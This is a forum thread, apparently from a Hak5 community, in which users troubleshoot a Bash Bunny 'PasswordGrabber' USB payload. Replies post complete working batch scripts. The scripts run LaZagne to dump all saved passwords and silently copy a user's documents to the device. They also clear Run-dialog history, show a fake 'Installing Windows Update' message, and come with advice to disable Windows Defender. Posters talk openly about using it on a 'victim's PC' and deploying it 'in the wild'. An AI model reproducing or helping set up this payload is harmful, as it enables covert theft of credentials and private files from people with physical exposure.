Need help with PasswordGrabber

[Cech]

Hey guys,

 

My Bash Bunny just arrived! But there is one problem, I've tried some payloads and all of them worked fine, but I had a problem with PasswordGrabber. There are a few codes in different documents so if anyone could tell me how to set it up on BashBunny?

 

https://github.com/hak5/bashbunny-payloads/pull/67

 

This is the script, but I don't really get it how to place it on BashBunny. Thank  you in advance!

[PoSHMagiC0de]

1) If you have not yet, update bunny and if so then ignore this.  This is just the common first answer you will get and has been the answer to many questions.

2) This payload needs an external project added, the Lazagne project, the compile version for Windows and it has to be in the switch folder with the payload.txt.

 

The compiled version is on the site too or you can follow the directions for the project for Lazagne to do your own compiling. 

[Cech]

I did everything, but nothing seem to work :/

(d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md) These are the files added to the switch folder but once I plug it in I get empty directories and also my firmware is 1.4 

 

[RazerBlade]

laZagne.py should not be their.

Also, check out my latest pull request on password grabber: fixes and makes somethings a bit easier to understand: https://github.com/hak5/bashbunny-payloads/pull/293/files

[Cech]

Hello RazerBlade, first of all thank you for your answer. But, since I'm a bit new to this, would you please explain me which files where it goes? Which file should go in the switch and which file to go somewhere else?

 

It's probably easier to understand for you professionals but not for regular people like me :) 

[PoSHMagiC0de]

I don't remember the e and d files being exes.  They were cmd files.

 

Try this.  If you got the lazagne.exe then copy it to the machine and run it.  According to the command file the command below should display output to the screen.

lazagne.exe all -v

If you get something then we know lazagne works.  Next with the bashbunny in arming mode run the command again but add in " > driveletterofBB:\loot\lazagnetest.txt" where driveletterofBB is the current drive letter of BashBunny.  We are just testing here to make sure everything works piece by piece.  

[Cech]

Whenever I open lasagne.exe (directly or through cmd) I get the following error and closes the program within a second. 

lazaGne.exe: error: too few arguments

[PoSHMagiC0de]

Are you including the "all" and the "-v".

If Lazagne is not even working then that explains the empty payload folder.

[D31M0Z]

in the explorer window shift+right click open powershell/cmd at location then 

./laZange.exe all -v

shouuld do it 

[D31M0Z]

when you just double click run it will error

[Cech]

Ok it works, it found all my passwords, but how do I place it in switch2 so when I place the BashBuny, into victim's PC the script to start attacking and to save all the passwords in loot folder instead of making an empty directories?

[D31M0Z]

Place it in the same switch folder as the payload

http://fav.me/dbu9s93

This is the line in e.cmd that runs laZange.exe

http://fav.me/dbu9smb

This is the line for your xcopy command (the one i have inserted pulls any existing MS word docs from the active user profile)

http://fav.me/dbu9spt

Hope the links worked and it helped! 

[D31M0Z]

The *'s are 'wildcards' you can replace them with desired target names or change the file extension (.doc) to any desired. 

[Cech]

I just followed all your steps and still, I get an empty directory :/

[D31M0Z]

Could be windows defender blocking LaZange from working, was the only thing I found that would give me an empty password.txt if it was active during scan. It also auto deletes hack tools or quarantines them automatically when active so I always shut it off before arming my bunny.

[Cech]

Do I need to configure something in these files or I just need ti place them in the "Switch2" directory along with laZagne.exe file?

 

If there is any configuration required to the following files, can you please help me out to sort these things out? 

d.cmd

e.cmd

i.vbs

payload.txt

readme.md

[D31M0Z]

Configure the xcopy command in e.cmd to whatever your trying to grab, I also found if I have set up internet share with the bunny it won’t dump files but it still grabs passwords with lazange. If you have sharing turned on in your main network card turn it off when testing the payload. ? lazange.exe/I.vbs/e.cmd/d.cmd/payload.txt should all be in the same switch (1/2) folded so they can be used together.

*Also use notepad++ not notepad cause it works better ?

[Cech]

Is this correct now?

e.cmd

[D31M0Z]

#the link you provided doesnt work since its a local file not an internet file lol but here is my e.cmd for txt files

@echo off
@echo Installing Windows Update
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
setlocal

#Below uses the laZange.exe in your switch folder

cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

#Below runs xcopy to grab file specified by location and file extension (the one below grabs simple .txt documents

#Try making a txt document on your desktop labeled target.txt then run the payload to see if it grabs it.

set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul)

#the line below spams caps lock to tell you that the payload is done and files are coppied (if you have a caps lock led on your keyboard it should blink when the payload finishes.)

start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

 

[Cech]

First I had to do a little changes because I had an error in the previous saying that  "gwin" does not exist (or something like that) so I've added the following code 

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

The script ran smoothly, but then the powershell window appeared and closed. Thought everything was perfect before I went at the last step at opening the loot directory. The loot directory is empty again..

[D31M0Z]

the only line i change when comeing frrom a fresh payload copy is:

the *'s are wildcards so the xcopy will search any directories or names in the

user profile containing txt files.

the /C /Q /G /Y are explained below the xcopy command /S makes sure it doesnt grab empty folders

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.doc %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)
 

 

[D31M0Z]

4 minutes ago, Cech said:

First I had to do a little changes because I had an error in the previous saying that  "gwin" does not exist (or something like that) so I've added the following code 

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

The script ran smoothly, but then the powershell window appeared and closed. Thought everything was perfect before I went at the last step at opening the loot directory. The loot directory is empty again..

the powershell opening then closing is the first line, everythiing else needs to load so dont prematurely pull the bunny.

wait for that caps lock to blink for the okay from the bunny itself.

the loot folder should contain a directory labeled with the victim then a txt file containing the lazange scan 

for example if i were to deploy this in the wild i would make sure it can be inserted and left for at least 5-10 min.

to make sure the xcopy command finishes and exits so i don't miss anything.

doesnt need to be 5-10 min. (only needs to hit the last line where it flashes caps lock)

but it gives me a time frame to wait on then come back to it and pull.

[Cech]

This is kind a strange..I've copied all your files and when I plugged in the USB I've got the notepad with all the usernames and passwords, so I was like...wow let's try it out again, the second time when I put the USB (was waiting for the caps lock to finish blinking) then I get again empty directories...

 

I was like, let's try once more maybe I did something wrong, I placed the USB inside my computer and again, empty directories..

[D31M0Z]

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

[D31M0Z]

Above is a direct copy of my e.cmd,  e.cmd is the only file i ever edit on this payload.

**try running it and before pulling the bash bunny try to 'eject' it from windows, 

if windows gives you an error message saying its busy then xcopy is still running so you need to wait**

**BB is fast but you still need to give it time for some payloads, especially exfiltration payloads**

**just think about how long it takes you to move pictures or docs into a normal flash drive,

the BB does have a  great transfer rate though lol**